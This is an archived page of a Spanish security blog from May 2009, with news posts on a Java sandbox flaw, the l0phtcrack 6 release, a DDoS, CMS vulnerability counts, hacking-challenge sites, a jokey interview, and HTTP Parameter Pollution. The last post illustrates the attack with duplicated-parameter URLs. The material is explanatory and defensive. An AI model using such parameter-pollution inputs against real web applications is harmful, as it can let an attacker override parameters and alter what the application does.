31 mayo 2009

Resucitando Twets borrados

Hace relativamente poco tiempo ha habido un gran debate sobre los contenidos generados en Facebook / Tuenti y compañía y lo que sucede / no sucede cuando eliminas ese contenido.

Twitter, el servicio de moda que, lo mismo te sirve como apoyo a tu sistema de monitorización, que para enviar información cifrada, no se podía quedar fuera de este maniqueo con los datos.

Acaba de salir online una herramienta que promete 'recuperar tweets borrados accidentalmente', llamada tweleted. Los detalles técnicos no tienen demasiada ciencia (todo está basado en las capacidades avanzadas de búsqueda del propio Twitter), pero si viene bien para añadir al argumentario de 'En Internet, arrepentirse no borra el rastro '.

Lógicamente existen múltiples herramientas para consultar datos que ya no estén disponibles, búsquedas en google del tipo cache:www.loquesea.com, usar Web Archive o, si presupones que una URL pueda desaparecer, puedes hacer un backup tu mismo usando Backupurl.

Un uso divertido de tweleted es que, dado el gran auge de dispositivos móviles con teclados muy pequeños, se pueden recuperar fácilmente meteduras de pata realmente divertidas.

El caso mas extremo de tweets 'inapropiados', sin duda, el de Connor Riley y su affaire con Cisco
Leer más...

30 mayo 2009

WOOE: Write Once, Own Everyone

Hace seis meses se reportó una vulnerabilidad en Java [CVE-2008-5353] que estaba relacionada con la deserialización de determinados objetos, permitiendo a un atacante remoto eludir totalmente el sandbox de la JVM, y ejecutar código en el sistema de la víctima haciendo uso de sus privilegios.

Esta vulnerabilidad afectaba a diversas plataformas y navegadores (Firefox, IE6, IE7, IE8, Safari, MacOS X, Windows, Linux y OpenBSD) pudiéndo ser explotada por un atacante haciendo que a la víctima visite una página web y cargue un Applet malicioso, llegándole a conceder permisos de lectura/escritura en archivos y ejecución de aplicaciones locales.

Desde el momento en el que se reportó esta vulnerabilidad, Sun parcheó el problema y esperábamos que Apple lo solucionará también, pero en el reciente Security Content celebrado el pasado 14 de mayo aún no han reportado ninguna solución al respecto, y Mac OS X sigue pidiendo a sus usuarios que desactiven los Applets de Java en los navegadores como "medida" para evitar este tipo de ataque.

Hay que destacar que Java está disponible en más del 80% de los navegadores web, lo que la convierte en un blanco jugoso para los atacantes. Además el mecanismo de actualización de Sun no está vinculado a la actualización del sistema operativo. Por otro lado, muchos usuarios y empresas actualizan periódicamente sus parches de Microsoft y no actualizan este tipo de software.

Por otra parte, estas empresas utilizan aplicaciones web o software de Java que dependen de una determinada versión de Java, y actualizarla puede resultar tedioso, ya que puede afectar a la funcionalidad de alguno de sus procesos. Quizás esto pueda ser la razón por la que las actualizaciones Java en Apple son tan poco frecuentes.

Lo importante en todo esto, es que encontrar una vulnerabilidad pura en Java u otro lenguaje multiplataforma, significa que el exploit podría ser 100% fiable y funcionaría en todas las plataformas, arquitecturas y en todos los navegadores.

Otro caso es el de .NET que hace uso de Mono para ejecutarse sobre las plaformas Linux, y explotar una vulnerabilidad en .NET no sólo afectaría a los ususarios de Windows, sino que otras plataformas se verían afectadas. Lo mismo ocurre con los lenguajes de scripting, encontrar una vulnerabilidad genérica podría afectar a varias plataformas.

Desde que los desarrolladores de aplicaciones web apuestan por determinados lenguajes para que sus aplicaciones puedan ser ejecutadas en todo tipo de plataformas y navegadores, se abre la caja de pandora a las vulnerabilidades de tipo client-side y sobre todo si un sólo exploit puede afectar a navegadores y plataformas por igual. El concepto WOOE (write once, own everyone) levantará muchos quebraderos de cabeza de ahora en adelante.

[+] Noticia vista en cr0g blog
Leer más...

29 mayo 2009

Entrevista a Chema Alonso (Maligno)

Chema Alonso es posiblemente el no-hacker (reniega de su especie) más famoso entre los hackers. Se ha hecho un nombre en el mundo internacional de la seguridad a base de contar todo aquello que sabe y hacerlo con humor y sencillez, nadie queda indiferente a sus charlas.

Esto es tan exagerado y real, que incluso hay una persona que sabe que íbamos a publicar una entrevista y me ha obligado a remitírsela antes de que tuviera la entrada escrita.

Desde hace un tiempo viene publicando en su blog entrevistas. Para todos sus lectores, que seguro desean verle a el bajo el foco, os dejo con la suya, que ha decido comenzar con una advertencia:


Vaya por delante que he decidió hackear vuestro blog por medio de un ataque de denegación de servicio de lectores, así que voy a contestar todas las preguntas como si fuera RoMaNSoFt.


¿Cuál fue tu primer coche? (esta es obligada, que es tu pregunta secreta para la cuenta en Live y con ella podré robar tu contraseña de hotmail)

Me alegra que me hagas esta pregunta... pues siempre quise vacilar de malignomoviles al estilo Batman, que será muy buena persona pero debe tenerla muy pequeña para tener esos pedazos de carros.

Me hubiera gustado tener un Lexus de esos superchulos y superpijos que llevan los jefes, pero mis comienzos fueron con una Nissan Vannete. Ese coche era la herramienta de trabajo de pintores de la familia y con ella, haciendo algo totalmente ilegal, me iba de farra antes de tener sacado el carné de conducir con 9 o 10 colegas metidos en ella. Me atreví incluso a hacer una rata en plena Principe de Vergara con los amigos.

Después…ya legalizado, me compré el Malignomovil 1.0. Un tres puertas muy chulo de segunda mano que se había visto inundado en algún sitio y que estuvo dando guerra hasta que murió en mis manos. Era un Seat Ibiza negro de “los cuadrados”. El acabose del malignomovil 1.0 fue cuando un mostolita más necesitado que yo decidió que mi radiocassette MX Onda de cinta valía más que mi salpicadero y que mi puerta con lo que decidió cambiar el aspecto del Malignomovil 1.0 por algo más eclético. (Descanse en paz en desguaces La Torre)

Entre el Maligno 1.0 y el 2.0 use de prestado un Renault Meganne durante tres o cuatro años en color verde que salió vivo tras tres o cuatro buenos accidentes. Hoy vive aun tranquilo disfrutando de su vejez en un tranquilo pueblecito de Soria.

El Malignomovil 2.0 fue un Audi TT, ya sabéis, de esos que llevamos los hombres de pito pequeño y ego grande. En color azul, con tracción quattro y 180 CV. Yo me lo flipaba en colores con Fito y Extremoduro cantando eso de “Y yo sigo aquí en mi nube azul todo es como yo lo he inventado…” hasta que cuatro años después, tras algún que otro abollón y siguiendo la dictadura del marketing, la productora me obligó a cambiar de modelo. Ya sabéis, para vender más coches y figuritas en blíster con el nuevo Malignomovil.

El Malignomovil 3.0 es un Nissan 350z en negro con los asientos naranjas. Es un poco más bestia, con 280 CV, un poco más grande, pero un poco menos pijo que el Malignomovil 2.0.

Si con esto no me robas la cuenta que uso para ligoteo…


¿Qué opinas del panorama actual de seguridad?

Panorama de la seguridad es algo así como todo… Pero… ya que me lo preguntas, y teniendo en cuenta que quiero hacer una entrevista impublicable debido al tamaño de las respuestas voy a contestarte en todos los aspectos.

Desde el punto de vista de los profesionales pienso que es la caña. Hay un montón de peña superbuena. Gente que sabe un huevo en todos los aspectos. Aquí hay unos crases del balón que no están bien valorados. Creo incluso que a las empresas españolas les (nos) falta visión internacional para vender los servicios en el extranjero con la capacidad de los profesionales. La lástima es, que faltando esa visión de nuestras empresas nacionales, muchos emigran a multinacionales.

Desde el punto de vista de las comunidades, es público que yo no vengo de ninguna comunidad underground (si no consideramos bronxtolex como tal), pero creo que se están haciendo muchas cosas. Últimamente es difícil que en un mes no haya entre 5 y 10 eventos de seguridad en España, que no haya algún reto hacking, algún paper superchulo o nuevas herramientas creadas por aquí.

En Internet, en esta web 3.11 para endogamia en grupo, empieza a haber gente que sabe de esto, y no técnicoless, que están compartiendo su conocimiento y experiencia con los nuevos “pibitos”.

En cuanto a las empresas que no tienen nada que ver con la seguridad, ya sabes, somos una empresa de la polla que construye/compra/distribuye/hace lo que sea, aun no se han puesto las pilas masivamente.


De todos los eventos en los que participas y has participado, ¿con cuál te quedas? ¿y el peor?

Esa sí que es una buena pregunta, que te voy a responder con mucho cariño. En mi mente hay varios eventos grabados a fuego.

Quizá el evento que recuerdo con más cariño fue un Security Day en Madrid en el año 2005 (creo) en el que en el palacio de congresos Rey Juan Carlos hubo 1.000 personas en una jornada de día completo. Allí fue donde me gané una queja oficial, pero me lo pasé de maravilla.

En cuanto al evento que más me gusta, por todo, es Defcon. Estar en la Defcon16 con el abuelo “Parada” cantando allí fue genial. Conocí a gente de mil sitios, animé a los Pandas, y, joder son Las vegas… te contaría cosas pero… sería romper la primera regla del club de la lucha.

Por último, me gusta mucho uno que me guiso y me como yo solo. Los Asegúr@IT. Mola, porque me hago las agendas a la carta, llevo a la peña que me apetece escuchar, y les pido que hablen de los temas que me molan a mí. ¿Soy o no un jeta?

Por último, he de decir, que no he ido a todos, y hay alguno de ellos que tengo muchas ganas de ir, como a la Ekoparty en Buenos Aires (please seleccionarme!!!!!!) o una RSA Conference, o HiTB, o CCC o… tantos a los que no he tenido el placer de ir.

Respecto al peor…


¿Qué opinas sobre el Cloud Computing? ¿y la web 2.0?


La nube, la puta nube que está en todas partes. Software como Servicio, aplicaciones en la nube y no en tu ordenador. Todo unpluged ¿Dónde están mis datos? La verdad, la idea suena muy bien, pero no he tenido tiempo aun ni de plantearme más vertientes y, después de pasar por la supercomputación, la tecnología grid computing que era el futuro, que ha evolucionado a la nube y el famoso cluster de playstations que iba a poner la peña para suplantar sus CPDs, paso de perder tiempo con modas que dan para muchas charlas. Supongo que el uso de servicios en servidores (sea un server virtualizado, un cluster, un supercomputer, un grid o una nube) seguirá creciendo día a día.

He visto internamente, haciendo uso del acuerdo que tengo firmado con Spectra de donación de órganos estando vivo en caso de irme de la lengua, el nuevo Office, con 100% de funcionalidades corriendo en un navegador. El Excel, el Word, el PowerPoint corriendo en los nuevos servidores Office. Como la nube. ¡Qué bonito!

Mi opinión sobre la web 2.0 es que está guay que haya más mujeres y hombres normales aquí que en la web 1.0 dónde sólo había frikis y enferm@s. Esto tiene mucho más color con gente normal. El problema es que con las oportunidades de una vida sexual más saludable han venido también otros especímenes. No sé si debimos abandonar el talk del UNIX y el ftp, para caer en esos que se abren grupos en facebook, y bots en Messenger para …


¿Has probado ya Windows 7? ¿Qué impresión te da?


Windows 7 es la caña, mola lo mires por dónde lo mires. Ahora estoy en el programa de Beta testing de Windows 7 en español y va a quedar superchulimegabonitoguay.

Windows 7 mantiene la evolución de Windows Vista y éste es una maravilla, a pesar de técnicolistas que no fueron capaces de hacer funcionar un driver o aplicación antigua. En Windows 7, resuelto ya los problemas de seguridad de XP en Windows Vista, se han centrado en la usabilidad, la interconexión, la nube, la web 2.0, etc… porque la gente lo que quiere es … y además es muy bonito. Vamos que un Windows 7 es un sistema superestable, pero que soporta tropecientos millones más de hardware, que tiene policientos millones más de programas, y encima sirve para trabajar en entornos corporativos. I’m loving it!


¿Cuál es la característica que más te ha sorprendido de Windows 7?


Pues mola el DirectAccess que permite tirar una VPN hasta a alguien que no sepa, como yo. Mola el Bitlocker to go, para cifrar volúmenes extraíbles, me pone el XP mode y las pequeñas mejoras en el interfaz. Pero lo que más llama la atención es la optimización del sistema, para hacer una experiencia gráfica increíblemente rápida y ligera. Y lo mejor de lo mejor es que sigue teniendo pelotitas…




¿Qué opinas de los IDS?, ¿y de los IPS? ¿y de los Firewalls de capa 7?


Eres un poco cabrón y mereces morir sólo por obligarme a responder estas tres preguntas, ya que parece un examen de la universidad. En general la tecnología reactiva IDS no es lo que más me pone. Suena superguay eso de inteligencia artificial, etc… pero soy de los que creo que es mejor poner IPSec antes que montar un supermega IDS (aunque sean compatibles). Los IPS me molan un poco más para el tema Web. Para mitigar cagadas en aplicaciones web un IPS puede ser la única solución si no controlas las webs que tienes que aguantar. Si se está dando hosting de manera profesional o se están publicando muchas aplicaciones web, no poner un IPS es una mala idea.

Lso Firewalls de capa 7… me molan, son guays y el nuevo ISA Server, llamado Threat Management Gateway es una solución chulísima. Publicidad: Durante Junio y Julio voy a dar cuatro charlas de TMG en Vigo, Valencia, Barcelona y Bilbao!

¿Vmware o Virtual PC?

Hiper-V y si hablas de máquina virtual en cliente… Hyper-V.

¿Cuál es la vulnerabilidad más gorda que te has encontrado?

Pues…¿te pongo los links?

Como sabes a mí me gustan las aplicaciones web y creo que he visto de todo, pero recuerdo cierta auditoría en la que se podían cambiar los precios de los pisos en venta y sacar los datos personales de más de 1.000 clientes pero al responsable le pareció… “poco importante”. Me hizo mucha gracia que un CSO dijera eso.


¿Cuales crees que serán los problemas de seguridad y las tendencias en los próximos años?

Pues creo que los problemas gordos seguirán siendo debidos al malware y que pasarán cada vez más de buscar vulnerabilidades en productos o webs, los ataques serán más masivos, más elaborados en ingeniería social y mucho más sofisticados una vez que se consigan permisos en una máquina. Y le darán caña a Apple porque es cool.

Los informáticos ganaremos mucha más pasta, los que trabajamos en seguridad informática seguiremos disfrutando de la fama y sobre todo, seguirá habiendo quien acepte todas las alertas.

Y luego el fin del mundo.



¿Cuando tienes planificado hacer el próximo reto de hacking?


Pues me alegra que me hagas esa pregunta porque el Reto Hacking X va a coincidir con el curso de Seguridad en la Universidad de Salamanca, será el reto del Señor Inalámbrico, de realizará por las calles de Salamanca. Tendrá lugar los días 8, 9 y 10 de Julio de este año y vendrá mucha gente interesante al curso. Tienes más info en esta URL: http://www.informatica64.com/CursoDeVeranoSalamanca

Organizas muchos wargames... pero ¿participas en alguno? ¿Cuál es el que más te gusta?

Pues hace bastante que no juego a ninguno. Hice los retos de boinas negras pero después de que los acabaran los grandes y participé en algunas pruebas del reto de blindsec. Realmente juego a muchos “retos hacking” a diario, pero en la intimidad…

La Foca ha tenido un gran impacto y está gustando mucho la solución. ¿Cuáles son las novedades reales que presenta?

La Foca es una herramienta que hicimos porque notamos ciertas carencias en libextractor y metagoofil. La Foca saca más info que libextractor, ya que manualmente hemos analizado cada uno de los tipos de fichero con que funciona la herramienta y se busca no sólo los metadatos, sino que además la Foca busca por información oculta tales como rutas a plantillas, impresoras, ficheros de imágenes y links a URLs. Además la FOCA busca también en Live, que completan mejor la lista de ficheros descubiertos. Además, ¿a que es molona?


¿Dónde y cuando escribes en tu blog? Es impresionante el ritmo y la continuidad ¿cómo lo haces?

¡Mira quién habla! Es público y notorio dónde redacto la mayoría de las profundas y sesudas reflexiones de mi blog, pero lo cierto es que complemento los braindump tronales con post elaborados en el sofá, en el tren, en los aeropuertos o en cualquier cafetería.

En cuanto a lo de escribir todos los días, pues la verdad es que desde hace tiempo lo que hago es dedicarme a vivir y trasponer mis vivencias en posts. Cada vez es menos maligno y cada vez es más yo ese blog… ¡Con lo que disfrutaba yo creando confusión constantemente…!

¿Alguna pista de la próxima herramienta de Informatica64?

Pues lo cierto es que ya hay varias cosas encoladas que iremos publicando. Lo primero acabar las pruebas de MetaShield Protector, luego una segunda evolución de La Foca que coincidirá con la Defcon17, además están pendientes por ahí algunas herramienta de BXI que se podrá ver en el Asegúr@IT VI, el Mummy con la métrica WiFi, una herramienta de Prefetching WebBrowsing muy chula …y alguna otra cosita suelta.


¿Qué tres libros y blogs de seguridad recomendarías?

Soy un lector voraz de casi cualquier cosa que huela a aventuras y ciencia ficción, así que te voy a recomendar muchos libros, pero de lectura.

Tres para saborear de autores españoles: 1) El señor Capone no está en casa de Andreu Martín, que he de reconocer que la novela negra me pone. 2) La ciudad de los prodigios de Eduardo Mendoza, que es una delicia de disfrutar y 3) El club dumas, que si hay un libro que me guste de Reverte es éste (¡Ríete tú del Código Davinci!).

Otros tres libros de literatura no hispana 1) Un mundo feliz, a pesar de que el final sea el de la incomprensión, de Aldous Huxley 2) Snowcrash, que eso de matarse a catanazos con los avatares tiene su aquel, de Neal Stephenson y 3)El misterio de Salmen’s Lot, que no me he cagado más en mi vida, del malote de Stephen King.

De Seguridad informática confieso que me ponen más los whitepapers que los libros y, como la mayoría de los que trabajamos en esto, los consumo masivamente. En cuanto a blogs de seguridad, me gusta SecurityByDefault (boing, boing), el de S21Sec, el de Hispasec, el de radajo, el de ConexionInversa,…y los clásicos guiris.


Porque estás en el lado del mal, ¿realmente eres un producto demarketing de Microsoft?

Es público y notorio que mis post son todos escritos por puño y letra de Bill Gates. Yo recibo una asignación mensual gracias a un acuerdo que tengo firmado que me permite decir lo que quiera menos mentar a la sagradísima señora de mi señor y a cambio, ellos dictan mis mensajes.

Realmente en la intimidad uso un MacOS con arranque dual en Ubuntu 9.0.3 que es más rápida que Windows7, consume menos, es más bonita, más usable y encima trata mejor al medio ambiente. Mi móvil es un Android y uso firefox como navegador habitual.

Pero no se lo digas a nadie.

No, en serio, estaba hasta la polla de tanto subnormal hablando mal de Microsoft cuando no se lo merecía. Entiendo que como todas las empresas, y especialmente las grandes, la caga muchas veces y la ha cagado muchas, muchas veces, pero ya era un cachondeo esto de criticar a Microsoft y se le criticaba cuando se lo merecía y cuando no, sólo por si acaso.


Todos sabemos qué prefieres Vista a XP, pero ¿XP o Ubuntu? y entre ¿Ubuntu y MacOS?

Todos sabes que prefiero Vista a XP, Vista a Ubuntu y Vista a MacOS. Si me das a elegir, prefiero MS-DOS a CPM, pero sigo excitándome todavía con los disquetes de 3 pulgadas.

Leer más...

28 mayo 2009

l0phtcrack finalmente liberado

Finalmente se publicado la herramienta para romper contraseñas "l0phtcrack" en su versión 6. Desde la página oficial se puede descargar una versión de evaluación. Este producto se distribuye con tres licencias distintas: profesional, administrador y consultor (ya sabíamos que los administradores y consultores no somos profesionales), con los siguientes aprecios: 295$, 595$ y 1195$ respectivamente.

La lista de "novedades" las podeís consultar en su ayuda: http://www.l0phtcrack.com/help/whats_new.html, de lo que destacaría el soporte para lenguajes distintos al inglés, soporte para contraseñas de Unix y una nueva interfaz ribbon o "de botón gordo" para los amigos.



La realidad es que han mejorado el diseño y añadido alguna cosa nueva, pero tras probar la demostración me ha decepcionado bastante. Parece un producto que integra funcionalidades de otras herramientas ofreciendo pocas novedades.

Tal vez una de sus características más interesantes sea el estudio de contraseñas que realiza una vez ha finalizado la ejecución, mostrando informes ejecutivos con los resultados, algo que ya hacía su versión anterior de forma más simple.


Leer más...

27 mayo 2009

ClamWin RT 1.0

ClamAV es un antivirus totalmente opensource cuyo nicho tradicional han sido los servidores Linux/Unix de correo electrónico para actuar como antivirus de pasarela.

Con el tiempo, aparecieron los primeros ports de ClamAV al entorno Windows desembocando en el proyecto ClamWin.

Tradicionalmente Clam ha puntuado decentemente bien en los tests anti-virus en los que ha sido comparado con otras soluciones comerciales, su handicap mas notable ha sido la falta de acceso-en-tiempo-real, es decir, Clam en un entorno Windows siempre actúa bajo demanda (tu tienes que lanzarlo contra el fichero / directorio / unidad que pretendas escanear).

Desde hace tiempo se lleva escuchando y leyendo por los foros del proyecto la posibilidad de que se añada soporte a acceso en tiempo real en futuras versiones.

Como en SbD somos un poquito impacientes, nos hemos adelantado al proyecto y hemos creado un añadido al programa que permite a Clam acceder en tiempo real a los ficheros que se vayan creando en el sistema.

El proyecto está en fase alpha y posiblemente tenga bugs.

Para usar ClamWin RT:

  1. Primero tienes que descargar e instalar ClamWin desde aquí
  2. Luego, descarga e instala ClamWin RT desde aquí
  3. Una vez instalado puedes pararlo / arrancarlo usando el menú inicio
Una vez instalado, cuando se detecte cualquier malware que esté en la base de datos de Clam, directamente te aparecerá un mensaje de aviso notificándote y dándote la oportunidad de eliminarlo


Leer más...

26 mayo 2009

DoS a WorldWide DNS

Al igual que el año pasado, el proveedor WorldWide DNS ha vuelto a ser víctima de ataques de denegación de servicio distribuido o DDoS desde las 1:00 a las 4:30 AM CST.

De momento, sólo lo indican en su página web, pero todos aquellos clientes de este proveedor (DNS fijos y dinámicos) se han encontrado esta mañana sin servicio. Las recomendaciones que el propio proveedor sugiere a sus clientes son aumentar el TTL (Time To Live) para las zonas DNS a 12 horas (43200 segundos) o más si no necesitan tener un valor de TTL muy bajo. La mayoría de los ISPs recomiendan un TTL de 24 horas (86400 segundos) o más.

Según WorldWide DNS, el ataque vino sin aviso ni provocación por su parte. Actualmente el servicio está restablecido, aunque no saben durante cuánto tiempo puesto que no conocen aún el origen del mismo.

En general, un ataque de denegación de servicio distribuido (DDoS) es uno de los más difíciles de defender debido al inmenso volumen de tráfico que viene desde diferentes orígenes (con muchas probabilidades de IPs spoofeadas). Hay que distinguir que, por un lado puede darse un ataque de denegación de servicio porque el caudal de ancho de banda entrante a una organización es colapsado, y por otra parte aquellos ataques basados en el comportamiento de una aplicación de procesamiento pesado (aquellas aplicaciones que una sola petición ya exige muchos recursos de una máquina).

En el primer caso, las soluciones son muy pocas. Por lo visto aquellos sitios que se han visto amenzados y/o atacados de esta manera, han podido mitigar el impacto mediante la utilización de servicios como Akamai (una red de cachés y aceleración de tráfico mediante la distribución de procesos). En el segundo caso, aplicaciones pesadas (pero el consumo de ancho de banda no se ve colapsado), hay otro tipo de soluciones, como incrementar el número de servidores que van a dar el servicio, utilización de dispositivos gestores de ancho de banda que permitan devolver a un cliente una respuesta de "ocupado" cuando los servidores aún no estén colapsados, permitiendo dar servicio con los recursos disponibles al menos a un número limitado de usuarios manteniendo la calidad del mismo.
Leer más...

Guía de Seguridad de Internet Explorer 8

En marzo se publicó la versión final de Internet Explorer 8, seguramente la aplicación que supone la entrada principal a los problemas de seguridad para el usuario.

Los cambios que presenta se han discutido ampliamente cuando se liberaron las betas el año pasado en el blog oficial IE:

Además de esta información, Microsoft crea un extenso y amplio documento para su securización. La guía, se puede descargar desde la siguiente página web:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=44405777-51b4-4376-9cef-f0341b13fcde#tm

Este mismo documento, también está disponible para la versión 7 del famoso navegador:
http://www.microsoft.com/DOWNLOADS/details.aspx?FamilyID=6aa4c1da-6021-468e-a8cf-af4afe4c84b2&displaylang=en

La guía detalla la fortificación mediante la modificación de parámetros en seis categorías principales:
  • Controles ActiveX
  • Controles de privacidad
  • Otras configuraciones de Seguridad
  • Zonas de Seguridad
  • Configuración de Seguridad
  • Filtro "SmartScreen"

El resumen de las principales recomendaciones son:
  1. Activar el filtro "SmartScreen"
  2. Activar la prevención para la eliminación de avisos del filtro SmartScreen
  3. No permitir a los usuarios añadir o borrar Zonas de Seguridad
  4. No permitir a los usuarios modificar las políticas de las Zonas de Seguridad
  5. No permitir al usuario desactivar el Modo Protegido
  6. Activar la prevención para ignorar errores de certificados
  7. Desactivar el autocompletado de formulariosr
Leer más...

25 mayo 2009

Comparativa de Seguridad Joomla, Wordpress, Drupal y Movable Type

Como ejercicio, vamos a comparar cuatro de los gestores de contenido más populares gratuitos: Drupal, Wordpress, Joomla!, y Movable Type.

Particularmente no creo en este tipo de comparativas y considero esta entrada casi como un artículo de opinión, ya que hay siempre cientos de condicionantes y puntualizaciones de los que hablaremos. Contemplarlos todos es prácticamente imposible. Además nos encontramos con que no sirve de nada tener el sistema más seguro si el administrador acaba poniendo de contraseña "qwerty" o si no actualiza nunca el software. Tampoco es justo comparar aplicaciones con funcionalidades distintas, ya que a mayor complejidad mayor número de vulnerabilidades se encontrarán.

El estudio puede ser usado para valorar la seguridad como un punto más si tenemos que decidir que aplicación utilizar.

La primera problemática es encontrar el número de vulnerabilidades por producto en una determinada ventana de tiempo, hay varios repositorios con esta información, pero cada uno muestra datos distintos, además de que hay notas de seguridad (advisories) que engloban más de un fallo de seguridad. Hemos seleccionado Secunia, CVE y los boletines oficiales de las aplicaciones para contabilizar estos datos.

Usando Secunia como fuente de datos, y limitando las vulnerabilidades al núcleo de la aplicación y no los módulos desarrollados por terceros, se obtiene las siguientes gráficas para lo que va de año 2009, 2008 y 2007.



De esta primera gráfica se observa que el único producto del que no se han reportado vulnerabilidades es WordPress, y el que mayor número de vulnerabilidades presenta es Drupal.



Para el año 2008, Drupal encabeza nuevamente el número de notas de seguridad, aunque Wordpress es la única que presenta un fallo de criticidad alta.



En el año 2007 Drupal y Movable Type no disponían de la versión actual: 6.x y 4.x respectivamente y se han utilizado los datos de sus versiones anteriores, 5.x y 3.x. Wordpress y Drupal encabezan nuevamente la lista con mayor número de fallos y criticidades más altas. Los dos gestores de contenido de los que menos vulnerabilidades se han reportado son Joomla y Movable Type.

En cuanto a la representación total del número de vulnerabilidades según Secunia y usando el histórico desde el 2003 hasta la fecha actual es la siguiente:



La realidad es que el uso de plugins/addons por parte de este tipo de productos es muy habitual. Las facilidades que presentan para el desarrollo de módulos por parte de terceros han de contemplar los peores escenarios posibles, y deben añadir el mayor número de puntos de control de seguridad para evitar que estos desarrollos sean vulnerables.

Se muestra una aproximación según CVE con el total de vulnerabilidades por productos, incluidos los módulos de terceros en tres casos distintos. El total de vulnerabilidades reportadas, únicamente las vulnerabilidades críticas, y las vulnerabilidades reportadas entre el 2008 y el 2009.



Según se muestra, Joomla! presenta muchas más vulnerabilidades que sus competidores, en gran parte por el número elevado de módulos disponibles. Drupal y Wordpress se mueven en marcos similares y Movable Type se destaca como el más seguro.

En la última gráfica se representan las vulnerabilidades según el fabricante para el año 2009. Esta información no corresponde en con las vulnerabilidades reportadas, ya que el fabricante decide si reportar y solucionar una vulnerabilidad o no.



Finalmente destacar que únicamente Droopal y Joomla disponen de un equipo de seguridad; Drupal Advirsorie Security Team y Joomla Security Strike Team, encargados de reportar y seguir los fallos encontrados. Para todos los casos se notifican vía RSS y correo las vulnerabilidades, aunque solo Joomla y Drupal disponen de portales dedicados a la seguridad. El producto que menos información y peor la remite es el de MovableType, que no dispone ni de una etiqueta asignada en su portal para referenciar las entradas de seguridad.

Las conclusiones y clasificación que yo obtengo de este análisis son las siguientes:
  1. Movable Type es sin duda el gestor con el menor número de vulnerabilidades y menos críticas, si bien es cierto que su uso es extendido no existen tantos módulos como para sus competidores y esto le está ahorrando sustos.
  2. Joomla! es un gestor potente sin apenas vulnerabilidades, pero ampliamente modulable y con problemas muy importantes en esta parte. El mantenimiento de este producto requerirá mucho esfuerzo y estar suscritos no solo a las alertas de seguridad del propio fabricante, si no la de todos los módulos que se usen.
  3. Wordpress tras el paso del 2007 ha mejorado su seguridad de forma muy significativa, aunque en el 2008 se reportó una vulnerabilidad alta en este año 2009 es el único del que no se ha reportado ninguna vulnerabilidad.
  4. Drupal no presenta ninguna vulnerabilidad crítica o alta desde el 2007, consolidándose como un producto seguro. Es modulable y existen muchos paquetes disponibles y al igual que en Joomla, peligrosos, por lo que se ha de tener especial atención en su mantenimiento.

Referencias:

Leer más...

22 mayo 2009

Hacking Challenges


Sólo quedan un par de meses para la famosa competición Capture The Flag (CTF) de la DEFCON en Las Vegas, donde los Sexy Pandas volverán por tercer año consecutivo a demostrar que les sobra potencial para explotar cualquier vulnerabilidad que se les ponga por delante.

Se que muchos de vosotros soñáis con tener algún día vuestro propio Team, y poder batiros en este tipo de competiciones.

Pero lo primero es entrenarse, no basta con saber utilizar el montón de herramientas de hacking que tenemos a nuestra disposición, pasaréis horas sin dormir, vuestra habitación parecerá un almacén de latas de coca cola y cajas de pizza, acabaréis teniendo pesadillas y soñando con líneas y líneas de código y hablando Hex (y no es una lengua de Star Trek), pero un día despertaréis y diréis mereció la pena!

Para vosotros, he recopilado retos y soluciones que pongo a vuestra disposición para ir practicando y quien sabe, quizás el día de mañana os podáis codear con ellos en alguna CTF.

En primer lugar los archiconocidos retos del Maligno en su blog El lado del mal, en los que se propone una web y deberás aplicar las distintas técnicas de hacking, como por ejemplo SQL Injection o saltarle los captchas.

Los conocidos retos de s21Sec, una de las empresas más conocidas de seguridad en España, que te ponen a prueba con retos de crackme, en los que deberás aplicar ingeniería inversa para poder solucionarlos y los últimos retos relacionados con las vulnerabilidades del MD5.

Si te gusta los juegos online aquí tiene dos muy trabajados, Mod-X en el que te pondrás en la piel de un agente y tendrás que ir entrando en sistemas y vencer a los intrusos, y HackQuest en donde deberás demostrar tus habilidades en cracking, JavaScript, criptografía y PHP.

Pero si lo que quieres es sentir la satisfacción de ser owner visita RootHack.org, en donde además podrás realizar auditorías para encontrar vulnerabilidades en el código y los servicios. Y para los amantes de la seguridad UNIX, no puedes perderte HackersLab.

GeekPuzzle te pone a prueba con sus retos enrevesados, en donde tendrás que aplicar las técnicas de esteganografía, sniffing, cracking en una misma prueba.

Otro sitio muy completo es NetForce en donde encontraréis retos de Web, criptografía, cracking, esteganografía, Internet y programación. Los retos de Kriptopolis, creo que no hace falta que mencione de que tratan. HackThisSite.Org con pruebas de Web, cracking y criptografía o los desafíos de Hackerss.com.

No podía terminar si nombrar el recopilatorio de HackerGames.Net y los conocidos retos de The Ethical Hacking Network. Y para los que quieran iniciarse con algo facilito pueden probar en Try2Hack

Si necesitas una wiki de soluciones no dudes en consultar el solucionario de retos de Dani Kachakil, todo un crack en esto.

Desde este blog, esperamos algún día poder ofrecer retos, siempre éticos, con los que podáis disfrutar y pasar un buen rato.
Leer más...

21 mayo 2009

Seguridad Web: HTTP Parameter Pollution

Por todos es conocido que los servidores web son uno de mayores objetivos de los ataques de hoy en día. El dinero y los datos accesibles a través de los portales web, con la finalidad de ofrecer un servicio, una vez más, se ven afectados por una nueva amenaza, un nuevo tipo de ataque.

En concreto, esta nueva técnica ha sido expuesta durante la conferencia OWASP Appsec Poland 2009 por parte de los expertos en seguridad Stefano Di Paola y Luca Carettoni y ha llegado en modo de correo a los suscritos a Bugtraq.

¿En qué consiste el ataque?
Pues una vez más (como sucede con un SQL Injection o una inyección de comandos) en la reacción que tiene el servidor web ante la manipulación de algún parámetro o cabecera en una aplicación web.

En este caso, consiste en la interpretación que tiene un servidor web cuando se repite el nombre de un parámetro dentro de la misma petición. Un ejemplo:

http://www.miaplicacion.com/index.asp&variable1=val1&variable2=val2

En este caso, cada variable recibiría su valor correcto por parte del servidor web y todo OK.

Sin embargo, supongamos que http://www.miaplicacion.com/index.asp&variable1=val1&variable1=val2

¿Qué valor tendría variable1 esta vez? Pues la respuesta es: depende del servidor web que lo interprete. Unos servidores asignarán el val1 y otros asignarán val2. En otros casos como IIS, su mecanismo interno los concatenará.

Por ejemplo, IIS se sabe que los concatena separándolos por comas. Apache solamente se queda con el primer valor que recibe un parámetro desechando el resto.

El impacto de este comportamiento por parte de los servidores Web puede ser enorme a la hora de procesar los argumentos, y puede dar lugar a múltiples posibilidades como sobreescritura de parámetros HTTP definidos por la aplicación en la URI, alteración del comportamiento de la aplicación, acceso y modificación de variables,... etc

Algo muy interesante es que aquellas empresas que como medidas preventivas de protección de sus aplicaciones web tengan un WAF (Web Application Firewall), que les permita sanitizar la entrada de las peticiones entrantes, tampoco estarán protegidas del todo.

